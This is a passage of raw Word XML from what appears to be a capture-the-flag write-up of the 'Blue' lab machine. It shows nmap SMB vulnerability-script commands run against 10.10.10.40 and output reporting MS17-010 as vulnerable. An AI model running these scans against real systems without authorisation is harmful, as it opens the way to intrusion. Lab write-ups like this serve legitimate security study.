      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb-vuln-conficker.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>smb-vuln-cve2009-3103.nse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>smb-vuln-cve-2017-7494.nse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>smb-vuln-ms06-025.nse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>smb-vuln-ms07-029.nse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>smb-vuln-ms08-067.nse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>smb-vuln-ms10-054.nse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>smb-vuln-ms10-061.nse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>smb-vuln-ms17-010.nse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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb-vuln-regsvc-dos.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Lora" w:eastAsia="Times New Roman" w:hAnsi="Lora" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Let’s try all the previous scripts for port 445 of the SMB service.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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[~/Desktop/APOLO/Ethic4l-Hacking/Operations/Premium/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue]─</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[root@Arthorias]─[0]─[3672]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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╰</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script=smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse -p445 10.10.10.40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 xml:space="preserve">Starting Nmap 7.70 </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 2019-04-09 09:24 -05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 xml:space="preserve">Nmap scan report </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10.10.10.40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 xml:space="preserve">Host is up </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.69s latency</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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>PORT    STATE SERVICE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 xml:space="preserve">445/tcp </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">open  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>microsoft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-ds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>Host script results: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>|_smb-vuln-ms10-054: false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>|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND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 xml:space="preserve">| smb-vuln-ms17-010: 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>|   VULNERABLE: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 xml:space="preserve">|   Remote Code Execution vulnerability </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SMBv1 servers </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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>|     State: VULNERABLE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 xml:space="preserve">|     IDs:  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE:CVE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-2017-0143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>|     Risk factor: HIGH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 xml:space="preserve">|       A critical remote code execution vulnerability exists </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft SMBv1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 xml:space="preserve">|        servers </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ms17-010</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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 xml:space="preserve">|           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>|     Disclosure date: 2017-03-14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>|     References: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 xml:space="preserve">|       </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve">|       </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/en-us/library/security/ms17-010.aspx</w:t>
        </w:r>
      </w:hyperlink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 xml:space="preserve">|_      </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013348D" w:rsidRPr="0013348D" w:rsidRDefault="0013348D" w:rsidP="0013348D">
      <w:pPr>
        <w:spacing w:after="225" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Another way to evaluate the above is using the scripts of the category </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╭</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[~/Desktop/APOLO/Ethic4l-Hacking/Operations/Premium/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Blue]─</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[root@Arthorias]─[0]─[3672]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MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>╰</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>vuln</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p445 10.10.10.40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 xml:space="preserve">Starting Nmap 7.70 </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="0013348D">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://nmap.org</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> at 2019-04-09 09:22 -05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>Pre-scan script results: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>| broadcast-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>avahi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">-dos: 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>|   Discovered hosts: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>|     224.0.0.251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 xml:space="preserve">|   After NULL UDP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>avahi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> packet </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0013348D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13348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2011-1002</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.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>|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_  Hosts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> are all up </w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="0013348D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="21"/>
